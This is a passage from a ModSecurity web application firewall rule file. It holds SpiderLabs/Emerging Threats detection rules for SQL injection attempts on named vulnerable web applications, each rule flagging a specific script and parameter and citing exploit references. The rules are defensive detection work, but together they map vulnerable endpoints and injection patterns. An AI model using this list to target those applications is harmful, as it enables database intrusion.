UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule &TX:'/SQL_INJECTION.*ARGS:c/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004935) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PSY Auction SQL Injection Attempt -- item.php id UPDATE SecRule REQUEST_LINE "@contains /item.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004935,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PSY Auction SQL Injection Attempt -- item.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/17974'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PSY Auction SQL Injection Attempt -- item.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006735) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PWP Technologies The Classified Ad System SQL Injection Attempt -- default.asp main UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006735,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PWP Technologies The Classified Ad System SQL Injection Attempt -- default.asp main UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-6349'" SecRule &TX:'/SQL_INJECTION.*ARGS:main/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PWP Technologies The Classified Ad System SQL Injection Attempt -- default.asp main UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004264) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- post.php postid UPDATE SecRule REQUEST_LINE "@contains /post.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004264,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- post.php postid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3500'" SecRule &TX:'/SQL_INJECTION.*ARGS:postid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- post.php postid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005221) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- archives.php month UPDATE SecRule REQUEST_LINE "@contains /archives.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005221,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- archives.php month UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469984/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:month/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- archives.php month UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004623) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Particle Soft Particle Gallery SQL Injection Attempt -- viewimage.php editcomment UPDATE SecRule REQUEST_LINE "@contains /viewimage.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004623,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Soft Particle Gallery SQL Injection Attempt -- viewimage.php editcomment UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4019'" SecRule &TX:'/SQL_INJECTION.*ARGS:editcomment/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Soft Particle Gallery SQL Injection Attempt -- viewimage.php editcomment UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004094) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Phil-a-Form SQL Injection Attempt -- index.php form_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004094,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Phil-a-Form SQL Injection Attempt -- index.php form_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4003'" SecRule &TX:'/SQL_INJECTION.*ARGS:form_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Phil-a-Form SQL Injection Attempt -- index.php form_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Philboard SQL Injection Attempt -- philboard_forum.asp forumid UPDATE SecRule REQUEST_LINE "@contains /philboard_forum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004929,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Philboard SQL Injection Attempt -- philboard_forum.asp forumid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3295'" SecRule &TX:'/SQL_INJECTION.*ARGS:forumid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Philboard SQL Injection Attempt -- philboard_forum.asp forumid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004910) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PollMentor SQL Injection Attempt -- pollmentorres.asp id UPDATE SecRule REQUEST_LINE "@contains /pollmentorres.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004910,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PollMentor SQL Injection Attempt -- pollmentorres.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3301'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PollMentor SQL Injection Attempt -- pollmentorres.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005626) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php blogid UPDATE SecRule REQUEST_LINE "@contains /simplog/archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005626,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php blogid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20974/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:blogid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php blogid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005632) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php pid UPDATE SecRule REQUEST_LINE "@contains /simplog/archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005632,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php pid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20974/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php pid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005638) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- index.php blogid UPDATE SecRule REQUEST_LINE "@contains /simplog/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005638,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- index.php blogid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20974/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:blogid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- index.php blogid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006356) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ProNews SQL Injection Attempt -- lire-avis.php aa UPDATE SecRule REQUEST_LINE "@contains /lire-avis.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006356,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ProNews SQL Injection Attempt -- lire-avis.php aa UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21516'" SecRule &TX:'/SQL_INJECTION.*ARGS:aa/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ProNews SQL Injection Attempt -- lire-avis.php aa UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010189) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QUICKTEAM qte_result.php title Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /qte_result.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010189,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS QUICKTEAM qte_result.php title Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:title/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QUICKTEAM qte_result.php title Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rapid Classified SQL Injection Attempt -- viewad.asp id UPDATE SecRule REQUEST_LINE "@contains /viewad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005686,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rapid Classified SQL Injection Attempt -- viewad.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21197'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rapid Classified SQL Injection Attempt -- viewad.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp user UPDATE SecRule REQUEST_LINE "@contains /login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005026,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp user UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/458560/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp password UPDATE SecRule REQUEST_LINE "@contains /login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005032,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp password UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/458560/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:password/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp password UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005098) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp id UPDATE SecRule REQUEST_LINE "@contains /user_confirm.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005098,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22350'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005104) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp pass UPDATE SecRule REQUEST_LINE "@contains /user_confirm.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005104,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22350'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006944) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- recipe.php recipeid UPDATE SecRule REQUEST_LINE "@contains /recipe.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006944,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- recipe.php recipeid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2834'" SecRule &TX:'/SQL_INJECTION.*ARGS:recipeid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- recipe.php recipeid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- list.php categoryid UPDATE SecRule REQUEST_LINE "@contains /list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006950,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- list.php categoryid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2834'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoryid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- list.php categoryid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003834) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ResManager SQL Injection Attempt -- edit_day.php id_reserv UPDATE SecRule REQUEST_LINE "@contains /edit_day.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003834,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ResManager SQL Injection Attempt -- edit_day.php id_reserv UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3931'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_reserv/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ResManager SQL Injection Attempt -- edit_day.php id_reserv UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004605) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RevokeSoft RevokeBB SQL Injection Attempt -- class_users.php UPDATE SecRule REQUEST_LINE "@contains /inc/class_users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004605,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS RevokeSoft RevokeBB SQL Injection Attempt -- class_users.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4020'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RevokeSoft RevokeBB SQL Injection Attempt -- class_users.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005692) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listfull.asp ID UPDATE SecRule REQUEST_LINE "@contains /listfull.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005692,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listfull.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listfull.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005698) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- printmain.asp ID UPDATE SecRule REQUEST_LINE "@contains /printmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005698,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- printmain.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- printmain.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listmain.asp cat UPDATE SecRule REQUEST_LINE "@contains /listmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005704,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listmain.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listmain.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cat UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005710,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005716) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp cat UPDATE SecRule REQUEST_LINE "@contains /searchmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005716,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp Keyword UPDATE SecRule REQUEST_LINE "@contains /searchkey.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005722,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp Keyword UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:Keyword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp Keyword UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp area UPDATE SecRule REQUEST_LINE "@contains /searchmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005728,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp area UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:area/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp area UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005734) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp area UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005734,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp area UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:area/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp area UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005741) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp searchin UPDATE SecRule REQUEST_LINE "@contains /searchkey.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005741,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp searchin UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:searchin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp searchin UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- 